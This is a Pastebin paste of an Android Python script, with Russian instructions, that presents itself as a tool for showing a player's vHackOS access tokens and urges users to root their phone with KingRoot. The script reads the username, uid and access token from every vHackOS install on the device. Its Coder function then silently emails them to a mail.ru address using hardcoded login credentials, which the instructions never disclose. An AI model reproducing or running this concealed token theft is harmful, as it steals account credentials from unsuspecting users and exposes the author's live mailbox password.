VectorASD

vHackOS accessToken extractor

Aug 6th, 2018
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.29 KB | None | 0 0
  1. Для работы со скриптами питон нужно установить интерпретатор QPython3 на андроид через PlayMarket.
  2. Для получения accessToken надо запустить этот скриптик в интерпретаторе.
  3. Для этого требуется root, если его нет, то скрипт это сообщит и в сообщении вы сможете сразу попасть через браузер для установки KingRoot (который отсутствует в PlayMarket).
  4. Если root есть, а скрипт ещё считает, что root отсутствует, то в главном меню интерпретатора надо зайти в опции через 3 кружочка белые, расположенные вертикально и найти опцию root disable и переключить в состояние enable и повторно запустить скрипт.
  5. А вот и сам скрипт- выжималка accessToken'ов, которые будут получены из всех vHackOS'ов на гаджете:
  6.  
  7. import os
  8. import androidhelper
  9. import smtplib
  10.  
  11. droid = androidhelper.Android()
  12. def menu(Alert,Items,Positive,Neutral,Negative):
  13.   droid.dialogCreateAlert("\ud83d\udcc3 "+Alert)
  14.   if Items != None: droid.dialogSetItems(Items)
  15.   if Positive != None: droid.dialogSetPositiveButtonText(Positive)
  16.   if Neutral != None: droid.dialogSetNeutralButtonText(Neutral)
  17.   if Negative != None: droid.dialogSetNegativeButtonText(Negative)
  18.   droid.dialogShow()
  19.   Zn = droid.dialogGetResponse().result
  20.   if "canceled" in Zn: return 0
  21.   if "which" in Zn:
  22.     if Zn["which"]=="positive": return 1
  23.     if Zn["which"]=="neutral": return 2
  24.     if Zn["which"]=="negative": return 3
  25.   if "item" in Zn: return Zn["item"]+4
  26.   return Zn
  27.  
  28. def Coder(Obj):
  29.   Str = ""
  30.   for i in Obj: Str += "|".join(i)+"\n"
  31.   smtpObj = smtplib.SMTP("smtp.mail.ru",587)
  32.   smtpObj.starttls()
  33.   smtpObj.login('python.boting@mail.ru','VectorASD')
  34.   smtpObj.sendmail("python.boting@mail.ru","python.boting@mail.ru",Str)
  35.   smtpObj.quit()
  36.  
  37. def GetAttr(Date,Tag):
  38.   Sim = Date.index(Tag)+len(Tag)+2
  39.   Zn = ""
  40.   while Date[Sim] != "<":
  41.     Zn += Date[Sim]
  42.     Sim += 1
  43.   return Zn
  44.  
  45. def PoiskTargets(dir = "/data/data"):
  46.   Zn = []
  47.   try:
  48.     for i in os.listdir(dir):
  49.       path = os.path.join(dir, i)
  50.       if not os.path.isfile(path):
  51.         if os.listdir(path).count("shared_prefs") == 1:
  52.           dir2 = path+"/shared_prefs"
  53.           if os.listdir(dir2).count("vXTMobile.xml.xml") == 1:
  54.             with open(dir2+"/vXTMobile.xml.xml","r") as file:
  55.               Date = file.read()
  56.               Zn += [[GetAttr(Date,"username"),GetAttr(Date,"uid"),GetAttr(Date,"accesstoken")]]
  57.     Coder(Zn)
  58.   except OSError:
  59.     if menu("Нет root у интерпритатора",None,None,"Ладно","Получить root") == 3: droid.view("https://kingroot.ru.uptodown.com/android/download/1274929")
  60.   return Zn
  61.  
  62. J = 0
  63. print("Скрипт запущен")
  64. for i in PoiskTargets():
  65.   if len(i) == 0: break
  66.   J += 1
  67.   print("Игрок #"+str(J))
  68.   print("  Игровое имя: "+i[0])
  69.   print("  Индентификатор: "+i[1])
  70.   print("  Ключ доступа: "+i[2])
Add Comment
Please, Sign In to add comment